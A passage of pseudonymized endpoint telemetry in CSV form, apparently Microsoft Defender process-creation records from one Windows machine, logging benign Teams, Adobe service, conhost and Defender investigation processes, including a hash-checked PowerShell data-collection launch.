01:11:23.452349200+00:00,bc2a40b0-e853-4235-a25b-e86ff892a8e0,computerpii_0a470890c60768167990033d701e7bd881398861,156363,True,10.7740.19041.1052,False,11540474045171817,,11540474045172138,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1117,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:09:36.936430300+00:00,6996,SenseCncProxy.exe,4820,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:09:37.932464100+00:00,2021-06-23 01:11:23.452563+00:00,5d285377-c101-45bf-9310-442233f2b716,computerpii_0a470890c60768167990033d701e7bd881398861,156367,False,10.7740.19041.1052,False,11540474045137006,,11540474045172139,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1118,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:35.772157500+00:00,3688,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ahebkp 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:35.977259+00:00,2021-06-23 08:01:03.363615200+00:00,cb9e6149-4b5f-4e96-abe1-63a95ba36332,computerpii_0a470890c60768167990033d701e7bd881398861,165432,False,10.7740.19041.1052,False,11540474045136989,,11540474045174268,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1119,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:35.783210900+00:00,15784,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 07:58:35.772157500+00:00,3688,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ahebkp 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:35.977833500+00:00,2021-06-23 08:01:03.363720400+00:00,5569bf9d-8768-49c7-91c7-6937cfda6092,computerpii_0a470890c60768167990033d701e7bd881398861,165433,False,10.7740.19041.1052,False,11540474045174268,,11540474045174269,2021-06-23 07:58:35.772157500+00:00,3688,2021-06-23 07:58:35.772157500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3688,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-23 07:58:35.801322100+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1120,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:36.322046500+00:00,19732,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_nwabby 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:36.347247100+00:00,2021-06-23 08:01:03.363982300+00:00,a8306375-325b-4f5d-993c-92a4fc803d69,computerpii_0a470890c60768167990033d701e7bd881398861,165436,False,10.7740.19041.1052,False,11540474045136989,,11540474045174271,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1121,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:36.331120500+00:00,14368,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 07:58:36.322046500+00:00,19732,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_nwabby 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:36.347592900+00:00,2021-06-23 08:01:03.364067200+00:00,c36c0b0b-98f6-4100-ae0f-2816935b801f,computerpii_0a470890c60768167990033d701e7bd881398861,165437,False,10.7740.19041.1052,False,11540474045174271,,11540474045174272,2021-06-23 07:58:36.322046500+00:00,19732,2021-06-23 07:58:36.322046500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,19732,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-23 07:58:35.801322100+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1122,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:37.046968600+00:00,9924,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_rhcouz 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:37.243947400+00:00,2021-06-23 08:01:03.365347500+00:00,53433a00-5b63-4853-bc50-28702df0fb40,computerpii_0a470890c60768167990033d701e7bd881398861,165451,False,10.7740.19041.1052,False,11540474045136989,,11540474045174277,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1123,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:58:37.058566800+00:00,16208,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 07:58:37.046968600+00:00,9924,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_rhcouz 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:58:37.244543800+00:00,2021-06-23 08:01:03.365440800+00:00,86a1f544-e88e-41aa-8cd5-199c046c2ee5,computerpii_0a470890c60768167990033d701e7bd881398861,165452,False,10.7740.19041.1052,False,11540474045174277,,11540474045174278,2021-06-23 07:58:37.046968600+00:00,9924,2021-06-23 07:58:37.046968600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,9924,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-23 07:58:35.801322100+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1124,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:03.643799+00:00,11828,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:03.893328100+00:00,2021-06-23 09:46:45.465254400+00:00,87a599ca-4088-4371-b038-de8a4cbf0d6c,computerpii_0a470890c60768167990033d701e7bd881398861,166567,False,10.7740.19041.1052,False,11540474045137006,,11540474045174759,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1125,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:13.791988800+00:00,19536,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 09:45:03.643799+00:00,11828,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:13.903125+00:00,2021-06-23 09:46:45.465339500+00:00,dad7810a-3611-4974-81e1-9bf70e24d3b3,computerpii_0a470890c60768167990033d701e7bd881398861,166568,False,10.7740.19041.1052,False,11540474045174759,,11540474045174760,2021-06-23 09:45:03.643799+00:00,11828,2021-06-23 09:45:03.643799+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11828,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1126,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:18.200424400+00:00,16748,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\mtc4zlaa.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 09:45:13.791988800+00:00,19536,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 09:45:03.643799+00:00,11828,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:18.264725500+00:00,2021-06-23 09:46:45.466953800+00:00,065dc784-4ce6-480f-812a-b651a2603dc3,computerpii_0a470890c60768167990033d701e7bd881398861,166588,False,10.7740.19041.1052,False,11540474045174760,,11540474045174762,2021-06-23 09:45:13.791988800+00:00,19536,2021-06-23 